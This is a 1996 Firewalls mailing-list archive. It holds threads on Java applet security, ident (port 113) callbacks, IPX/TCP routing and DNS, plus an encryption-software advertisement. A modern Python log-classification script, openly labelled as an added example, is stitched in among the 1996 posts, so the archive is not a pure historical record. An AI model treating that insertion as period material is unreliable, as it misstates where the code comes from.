>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>Douglas M. Todd, Jr.
fc.com, Inc.
One Federal Street BLD 102
Springfield, MA 01105
PHN: 413-733-7333  FAX: 413-733-7725
Email: Doug@fc.com or Bunyan@msn.com

From firewalls-owner Fri Feb 9 11:45:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23698 for firewalls-outgoing; Fri, 9 Feb 1996 11:03:52 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23684 for ; Fri, 9 Feb 1996 11:03:46 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id OAA16136; Fri, 9 Feb 1996 14:02:50 -0500 (EST) From: Jeff Murphy Message-Id: <199602091902.OAA16136@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ?
To: peterg@mccaw-stg.com (Peter Gregory) Date: Fri, 9 Feb 1996 14:02:50 -0500 (EST) Cc: goran@btj.se, firewalls@greatcircle.com In-Reply-To: <9602091622.AA02154@radiatore.mccaw-stg.com> from "Peter Gregory" at Feb 9, 96 08:22:56 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>"What if the Java applet and its server (where it came from) are in cahoots
>to launch an attack on the client (ie. browsing) system? Seems to me it
>would be easy to launch a denial of service attack on the client machine,
>given that the browser will allow communication (of ANY nature!) between
>the server and client."

the following seems to read "can an applet attack your internal network
because it has been downloaded past your firewall". the answer is 'no'.

>>There exist a possibility for a Java applet to open up an outbound socket
>>connection (I have not verified this myself) from the Browser. If the
>>
>> [...]
>>
>>Examples that spring to my mind are to attack a screening router from
>>within a trusted network, launch rsh commands that otherwise would not

as you pointed out, the applet can open a connection back to the server
host and just blurt as much traffic back to it as possible. this might
impede firewall performance depending upon how fast your fw is and how
efficient java is. i have some server/client java code that i can use to
see how much traffic it can generate.

i don't see what else an applet can do in terms of malicious activity. the
user will most likely notice that their browser is running dog slow because
of the applet and they will move off of the page and the applet will die.
From firewalls-owner Fri Feb 9 11:54:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25598 for firewalls-outgoing; Fri, 9 Feb 1996 11:41:49 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA25593 for ; Fri, 9 Feb 1996 11:41:41 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id OAA16654; Fri, 9 Feb 1996 14:40:41 -0500 (EST) From: Jeff Murphy Message-Id: <199602091940.OAA16654@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ? To: proberts@clark.net (Paul D. Robertson) Date: Fri, 9 Feb 1996 14:40:40 -0500 (EST) Cc: ken@bridge.com, firewalls@GreatCircle.COM In-Reply-To: from "Paul D. Robertson" at Feb 9, 96 10:18:29 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

note: i'm not a java proponent. i really only 'play' with it from time to
time. but the statements like the following are so vague and general. many
people say "ohmygawd.. executing code! it's badbadbad!" but never state in
what ways it is bad. if you cite specifics, i'm sure you'll find that the
java security people have covered the bases. if you find something that is
not covered: even better, because it should be fixed asap.

please share your imaginings.. i'm interested in hearing about how you can
hack from java.

>Depends on what's running on the host, and what it's connected to.
>I can imagine lots of bad things, which would take evil code, but then
>that seems to be a matter of putting "click here" on a page now-a-days.
From firewalls-owner Fri Feb 9 11:59:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22473 for firewalls-outgoing; Fri, 9 Feb 1996 10:41:00 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA22465 for ; Fri, 9 Feb 1996 10:40:55 -0800 (PST) Received: from bastion.ppt.com by relay6.UU.NET with ESMTP id QQacfa24238; Fri, 9 Feb 1996 13:40:08 -0500 (EST) Received: from firewall.ppt.com (fw.ppt.com [206.220.97.2]) by bastion.ppt.com (8.7.3/8.7.3) with ESMTP id KAA16682 for ; Fri, 9 Feb 1996 10:40:10 -0800 (PST) Received: from ruby.ppt.com (ruby.ppt.com [198.102.200.15]) by firewall.ppt.com (8.7.3/8.7.3) with ESMTP id KAA22307 for ; Fri, 9 Feb 1996 10:40:09 -0800 (PST) Received: (from drc@localhost) by ruby.ppt.com (8.7.3/8.7.3) id KAA11899 for firewalls@greatcircle.com; Fri, 9 Feb 1996 10:40:02 -0800 (PST) From: "david r coelho" Message-Id: <9602091040.ZM11897@ppt.com> Date: Fri, 9 Feb 1996 10:40:02 -0800 X-Mailer: Z-Mail (3.2.1 10oct95) To: firewalls@greatcircle.com Subject: Web browser ports? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm getting some incoming packets to our Web server with src ports that are less than 1023. Are there browsers out there that use ports below 1023? Should I allow connections of the type: tcp src < 1023 dst = 80 -- david r. 
coelho                          email: drc@ppt.COM
personal productivity tools, inc        http://www.ppt.com
14141 miranda rd                        voice: (415) 917-7000
los altos hills, ca 94022-2045 usa      fax: (415) 917-7010

From firewalls-owner Fri Feb 9 12:09:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA20742 for firewalls-outgoing; Fri, 9 Feb 1996 09:57:29 -0800 (PST) Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA20735 for ; Fri, 9 Feb 1996 09:57:24 -0800 (PST) Received: from fred.digex.net (fred.digex.net [164.109.213.78]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id MAA04193; Fri, 9 Feb 1996 12:51:32 -0500 Message-ID: <311B890D.7100@access.digex.net> Date: Fri, 09 Feb 1996 12:49:01 -0500 From: "Eliot T. Ware" X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: Remo Inverardi CC: Firewall ListServer Subject: Re: Re[2]: routing table go through firewall ? References: <1996Feb08.154211.1590.2773@abainet.abacus.ch> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Remo Inverardi wrote:
>
> Just a little question that doesn't belong here,
> but who cares? ;) (you? sorry.)
>
> We want to run IPX/SPX and TCP/IP on the same
> network (over the same cable). Now the problem
> is, that there are several Novell Servers between
> us and the router that does connect us to the
> internet. Those Novell Servers seem to only pass
> on IPX/SPX packets and filter all TCP/IP traffic
> out. Where's the problem? Do we need to install
> any NLMs or something similar?
>
> bye and thanks for your help. iNVi.
>
> ----------------------------------------------------------------------
> Remo Inverardi - Voice +41 61 811 14 82 - Fax and BBS +41 61 811 14 42
> ABACUS Software Research AG - Rorschacherstr. 170 - CH-9006 St.
Gallen > ---------------------------------------------------------------------- >From your question, I assume the Novell servers are performing as routers. If that is the case, you will need to enable TCP/IP on the Novell servers and configure to route as necessary. This involves loading the TCPIP.NLM with the appropriate parameters and BINDing IP to both sides of the router in the server. Information on TCP/IP configuration can be found in the Red Book titled (I believe) "TCP/IP for Supervisors". -Eliot -- Eliot T. Ware, CNE voice: (202) 622-1302 Global Systems Architect fax: (202) 622-2582 Department of the Treasury (UNIBAND) preferred: etware@access.digex.net alternate: eliot.ware@treas.sprint.com From firewalls-owner Fri Feb 9 12:23:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21333 for firewalls-outgoing; Fri, 9 Feb 1996 10:11:25 -0800 (PST) Received: from maildrop.micrognosis.com (supernova.micrognosis.com [192.233.13.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA21328 for ; Fri, 9 Feb 1996 10:11:20 -0800 (PST) Received: by maildrop.micrognosis.com (4.1/SMI-4.1) id AA25917; Fri, 9 Feb 96 13:10:29 EST Received: from singhi.corp.micrognosis.com(193.32.166.28) by supernova.micrognosis.com via smap (V1.3) id sma025898; Fri Feb 9 13:10:05 1996 Received: from java (java.corp.micrognosis.com) by corp.micrognosis.com (4.1/1.0-integ.cf) id AA20983; Fri, 9 Feb 96 13:13:42 EST Received: from java by java (SMI-8.6/SMI-SVR4) id NAA05898; Fri, 9 Feb 1996 13:15:26 -0500 Message-Id: <311B8F3E.5F14@corp.micrognosis.com> Date: Fri, 09 Feb 1996 13:15:26 -0500 From: Adam Jack Organization: CSK/Micrognosis Inc. X-Mailer: Mozilla 2.0b6a (X11; I; SunOS 5.5 sun4m) Mime-Version: 1.0 To: "Paul D. Robertson" Cc: firewalls@greatcircle.com Subject: Re: JAVA security problem ? 
References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Paul D. Robertson wrote:
>
> [...] I don't want my users running anything
> that hasn't been approved. With a proxy, at least I'm assured that
> it's HTTP that's being spoken.
>

That's fair. I imagine that is part of the reason why Applets within Netscape do not have access to SOCKS or https.

> > Your Paranoia May Vary
>

Maybe - but I doubt that of the Netscape lawyers will...

Adam
--
+1-203-730-5437 | http://www.micrognosis.com/~ajack/index.html
ajack@corp.micrognosis.com -> ajack@netcom.com -> ajack@?.???

From firewalls-owner Fri Feb 9 12:24:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22322 for firewalls-outgoing; Fri, 9 Feb 1996 10:38:04 -0800 (PST) Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22260 for ; Fri, 9 Feb 1996 10:36:14 -0800 (PST) Received: from assateague.ch.inri.com (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id NAA15042; Fri, 9 Feb 1996 13:37:34 -0500 Date: Fri, 9 Feb 1996 13:37:34 -0500 Message-Id: <199602091837.NAA15042@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Jim Legg , firewalls@GreatCircle.COM From: wbunting@ch.inri.com (Bill Bunting) Subject: Re: port 113?
Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 11:36 AM 2/9/96 +0500, Jim Legg wrote:
>Hi,
>
>I noticed in my log files the following (just a snippet):
>
>2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
>2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
>2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn
>2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn
>2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
>2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
>2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
>2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>
>When this web site (nslookup returns Facade.COM) is accessed it tries to come
>back to your system on port 113. What is this port? (It's not listed in my
>/etc/services)

This is the ident protocol. The WWW server is trying to associate a user name with the connection by using the identification protocol. Sendmail will do the same thing (if configured).
--------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Fri Feb 9 12:43:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21911 for firewalls-outgoing; Fri, 9 Feb 1996 10:27:14 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA21906 for ; Fri, 9 Feb 1996 10:27:06 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id NAA15491; Fri, 9 Feb 1996 13:26:07 -0500 (EST) From: Jeff Murphy Message-Id: <199602091826.NAA15491@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ? To: mdr@vodka.sse.att.com Date: Fri, 9 Feb 1996 13:26:06 -0500 (EST) Cc: Firewalls@greatcircle.com In-Reply-To: <9602091542.AA11672@ig4.att.att.com> from "mdr@vodka.sse.att.com" at Feb 9, 96 10:50:36 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >An how do they know from whence they came? Do I smell an IP spoofing >attack? in netscape, you open a URL .. http://www.foo.com/applet.html and it downloads an applet.. the applet attempts to open a socket to 'firewall.your.com' and it fails... because the socket class that is available via netscape only permits it to connect to the host designated in the above URL. if you can use IP spoofing to change the URL listing in the "Location:" box of a browser.. i'd be fairly impressed. 
after thinking about it a bit more than i really wanted to.. i dont see how an applet can get around only being able to connect to www.foo.com.

jeff

From firewalls-owner Fri Feb 9 12:54:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21167 for firewalls-outgoing; Fri, 9 Feb 1996 10:04:49 -0800 (PST) Received: from mailer.mda.ca (mailer.mda.ca [142.73.130.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA21153 for ; Fri, 9 Feb 1996 10:04:40 -0800 (PST) Received: from conan.mda.ca by mailer.mda.ca; (5.65v3.2/1.1.8.2/06Oct95-0117PM) id AA08318; Fri, 9 Feb 1996 10:03:51 -0800 Received: from localhost.mda.ca by conan.mda.ca via SMTP (931110.SGI/931108.SGI.ANONFTP) for @mailhost.mda.ca:firewalls@greatcircle.com id AA19590; Fri, 9 Feb 96 10:03:25 -0800 Message-Id: <9602091803.AA19590@conan.mda.ca> X-Mailer: exmh version 1.6.5 12/11/95 To: Jim Legg Subject: Re: port 113? In-Reply-To: legg's message of Fri, 09 Feb 1996 11:36:03 +0500. <9602091636.AA25002@sun1plus.liebert.com> Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 09 Feb 1996 10:03:17 -0800 From: Ed Osterman Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

----------------------------------------------------------------------------
Jim Legg writes:
> Hi,
>
> I noticed in my log files the following (just a snippet):
>
> 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
> When this web site (nslookup returns Facade.COM) is accessed it tries to come
> back to your system on port 113. What is this port? (It's not listed in my
> /etc/services)
>
> Thanks.
>
> -jim-
>

When you send mail to someone, they are entitled to do a reverse query to validate your address, etc. That validation occurs via port 113, using the auth or ident daemons. See RFCs 931 and 1413. Lots of sites block this service because authentication is not mandatory and the mail will be sent anyways.
regards,
--
Ed Osterman eo@mda.ca

From firewalls-owner Fri Feb 9 13:09:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28050 for firewalls-outgoing; Fri, 9 Feb 1996 12:25:23 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28027 for ; Fri, 9 Feb 1996 12:25:11 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id OAA15481 for GreatCircle.COM!firewalls; Fri, 9 Feb 1996 14:11:33 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA26182; 9 Feb 96 14:06:20 CST (Fri) Received: by sonic.nmti.com; id AA28623; Fri, 9 Feb 1996 13:36:44 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602091936.AA28623@sonic.nmti.com.nmti.com> Subject: Re: Product selection To: jon@london.hcsc.com (Jon Shallow) Date: Fri, 9 Feb 1996 13:36:44 -0600 (CST) Cc: peter@nmti.com, jon@london.hcsc.com, firewalls@GreatCircle.COM In-Reply-To: <9602091727.AA12653@london.csd.harris.com> from "Jon Shallow" at Feb 9, 96 05:27:39 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Depends on how the firewall is set up. A firewall worth its salt these
> days will have both dynamic (state driven ) packet filtering and proxies.
> The proxy could try to establish another TCP connection, but this
> connection would have to be permitted by the packet filtering.

And what about a proxy that's *expected* to open TCP connections, for example an SMTP proxy? No, he couldn't attach to port 23, but odds are there's opportunities on port 25 somewhere.
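For the port 113 thread above (Jim Legg's log snippet and the replies from Bill Bunting and Ed Osterman), here is an added example, not code from any of the posters, that parses log lines in the format Jim quoted and separates the ident callbacks our own outbound connections provoked from inbound port 113 SYNs that nothing on our side triggered. The sample log is constructed from the quoted snippet plus one extra line; the 60-second window and the "!pass(n)" drop marker interpretation are assumptions.

```python
"""Classify inbound ident (TCP/113) callbacks seen in a packet-filter log.

Added example for the port 113 thread; not code from any poster. An inbound
SYN to port 113 that arrives shortly after our own outbound connection to the
same host is the normal ident callback described in the thread; one with no
such outbound connection is worth a second look.
"""
import re
from collections import defaultdict

# Constructed sample log, modelled on the snippet quoted in the thread.
# The last line (10.9.8.7) is added to show an ident probe we did not provoke.
SAMPLE_LOG = """\
2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn
2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn
2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
2/9-10:45:00-81 tcp 199.18.25.195/113 <- 10.9.8.7/4000 44 syn !pass(64)
"""

# One log line: date-time-seq, proto, local addr/port, direction, remote
# addr/port, length, flags, and an optional "!pass(rule)" marker, which we
# assume means the filter dropped the packet under that rule number.
LINE_RE = re.compile(
    r"^(?P<mon>\d+)/(?P<day>\d+)-(?P<hh>\d+):(?P<mm>\d+):(?P<ss>\d+)-\d+\s+"
    r"(?P<proto>\w+)\s+(?P<local>[\d.]+)/(?P<lport>\w+)\s+(?P<dir>->|<-)\s+"
    r"(?P<remote>[\d.]+)/(?P<rport>\w+)\s+\d+\s+(?P<flags>\w+)"
    r"(?:\s+!pass\((?P<rule>\d+)\))?\s*$"
)

IDENT_PORT = "113"
CALLBACK_WINDOW = 60  # seconds; an ident callback follows our connect almost at once


def parse_line(line):
    """Return a dict for one log line, or None if it is not in this format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Seconds since midnight is enough to order events within one day's log.
    rec["t"] = int(rec["hh"]) * 3600 + int(rec["mm"]) * 60 + int(rec["ss"])
    rec["dropped"] = rec["rule"] is not None
    return rec


def classify_ident_callbacks(log_text, window=CALLBACK_WINDOW):
    """Per remote host: inbound 113 SYNs provoked by our own outbound
    connection ("expected") versus not ("unsolicited"), how many the filter
    dropped, and the distinct remote source ports. Each distinct port is one
    connection attempt; repeats of the same port are SYN retransmits, as in
    the 1867/2005/2007 runs above (the remote server keeps retrying because
    the filter silently drops the SYN instead of refusing it)."""
    last_outbound = {}  # remote addr -> time of our most recent outbound SYN
    report = defaultdict(lambda: {"expected": 0, "unsolicited": 0,
                                  "dropped": 0, "attempts": set()})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["flags"] != "syn":
            continue
        if rec["dir"] == "->":
            last_outbound[rec["remote"]] = rec["t"]
            continue
        if rec["lport"] != IDENT_PORT:
            continue
        entry = report[rec["remote"]]
        t0 = last_outbound.get(rec["remote"])
        if t0 is not None and 0 <= rec["t"] - t0 <= window:
            entry["expected"] += 1
        else:
            entry["unsolicited"] += 1
        if rec["dropped"]:
            entry["dropped"] += 1
        entry["attempts"].add(rec["rport"])
    # Sorted lists make the report stable to print and compare.
    return {host: dict(e, attempts=sorted(e["attempts"]))
            for host, e in report.items()}


if __name__ == "__main__":
    for host, e in classify_ident_callbacks(SAMPLE_LOG).items():
        print(host, e)
```

Hosts with only "expected" callbacks are web or mail servers doing what Bill and Ed describe; a host with "unsolicited" entries is probing port 113 on its own initiative and belongs in the log review.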
From firewalls-owner Fri Feb 9 13:28:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29068 for firewalls-outgoing; Fri, 9 Feb 1996 12:44:16 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA29061 for ; Fri, 9 Feb 1996 12:44:08 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA27011; Fri, 9 Feb 96 15:46:44 EST Date: Fri, 9 Feb 1996 15:46:43 -0500 (EST) From: Scott Barman To: "Douglas M. Todd, Jr." Cc: Firewalls@GreatCircle.COM Subject: Re: Would anyone know how to route www.foobar.COM In-Reply-To: <311B939B.32FC@fc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Fri, 9 Feb 1996, Douglas M. Todd, Jr. wrote:
> to foobar.com on a DNS server? Where in the named file & what format
> is it in?

Look in your named.boot for the name of the file that is the primary for your domain, this may look like:

    primary foobar.com db.foobar

If this is the case, then add the following in db.foobar:

    www.foobar.com. IN CNAME foobar.com.

Good luck.

scott barman
--
scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."
- scott barman From firewalls-owner Fri Feb 9 13:30:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28173 for firewalls-outgoing; Fri, 9 Feb 1996 12:27:24 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28165; Fri, 9 Feb 1996 12:27:13 -0800 (PST) Received: from clark.net (mjr@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id PAA23036; Fri, 9 Feb 1996 15:26:25 -0500 (EST) From: "Marcus J. Ranum" Received: (from mjr@localhost) by clark.net (8.7.1/8.7.1) id PAA15612; Fri, 9 Feb 1996 15:26:12 -0500 (EST) Message-Id: <199602092026.PAA15612@clark.net> Subject: Ultimately secure firewall -- To: firewalls@GreatCircle.COM Date: Fri, 9 Feb 1996 15:26:06 -0500 (EST) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: <199602081703.JAA02123@miles.greatcircle.com> from "owner-firewalls-digest@uunet.uu.net" at Feb 8, 96 09:03:09 am Reply-To: mjr@v-one.com Organization: V-One Corporation, Baltimore, MD Office Phone: 410-889-8569 X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Newton writes: > >I have a need to point out some network security problems to an >acquaintance, and thought it'd be effective if I illustrated some >of them my pointing him at "The ULTIMATELY secure firewall" page The Ultimate firewall page has moved to http://www.v-one.com/pubs along with most of my other stuff. I've actually been considering pricing the cost of a case or 2 of cheap wire-clippers with custom silk-screened handles reading "Ultimate Firewall" :) mjr. 
From firewalls-owner Fri Feb 9 13:32:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29117 for firewalls-outgoing; Fri, 9 Feb 1996 12:44:42 -0800 (PST) Received: from server.iadfw.net (server.iadfw.net [204.178.72.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA29079 for ; Fri, 9 Feb 1996 12:44:24 -0800 (PST) Received: from [206.66.11.145] (dal05-15.ppp.iadfw.net [206.66.11.145]) by server.iadfw.net (8.7/8.7) with SMTP id OAA27469; Fri, 9 Feb 1996 14:41:32 -0600 (CST) Message-Id: <199602092041.OAA27469@server.iadfw.net> To: A Padgett Peterson , Danny Boulet , exceed , firewalls , Gordon Rowell , "Walter F. Inetman" Subject: New Encryption SDoftware Technology Available Date: Fri, 09 Feb 96 14:45:30 -0500 From: Walter Chek X-Mailer: E-Mail Connection v2.5.03 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -- [ From: Walter Chek * EMC.Ver #2.5.02 ] -- Press Release from Antelope Productions February 7, 1996 Subject: New Encryption Software; Quick@Crypt Antelope Productions, Inc. is releasing our new encryption package called Quick@Crypt that has several advantages over any other encryption software available on the market. Now more than ever, there is a need for security in transferring sensitive information through the Internet and networks worldwide. There has not been a universal way for people to send all types of files easily, inexpensively and securely through the Internet or networks UNTIL NOW. All other encryption software available on the market requires a separate license for each site (the sender as well as the receiver). With Quick@Crypt you may freely distribute the decryption program. Only the encryption side requires a licensed copy of Quick@Crypt. There is also no limit on the password size and there is no restriction on overseas use. You will find pricing of Quick@Crypt a real bargain, given the pricing and functionality compared to other available encryption packages. 
Our price is only $99.95 plus $5 shipping in US plus state sales tax in Texas, New Jersey and Florida. Quantity discounts are also available. Installation is performed easily on any Windows or Windows 95 system. Memory requirements with as little of 2 MB of RAM (I tried it on a Tandy portable with 2 MB!). We also have a version to work in DOS. There is a floating toolbar that always remains on top of your current open window. Quick@Crypt's floating toolbar gives you four options. 1. Encryption-You have a user friendly screen to select the drive, directory and files that you want to encrypt. Chosen files for encryption are grouped together and compiled into a single executable file with an assigned password you enter. There is no limitation on the password size. Overseas distribution of the encrypted files is not restricted. File encryption often takes less then ten seconds. 2. Decryption- Allows you to select the drive, directory and file you want to decrypt. The password is requested once you select the encrypted file. Decryption is performed in Windows or Windows 95 with the freely distributed decryption module. Decryption module is sent to each receiver with no licensing requirement. Decryption of the executable file may also be performed at the DOS prompt with no additional software. 3. Help- A user friendly system for all of Quick@Crypt's functions, along with an index and glossary. 4. Exit For more information, wholesale quotations, or ordering, you can call 1-800 -270-7033 or 1-800-356-4831. You can also call Walter Chek at 214-252-1318. 
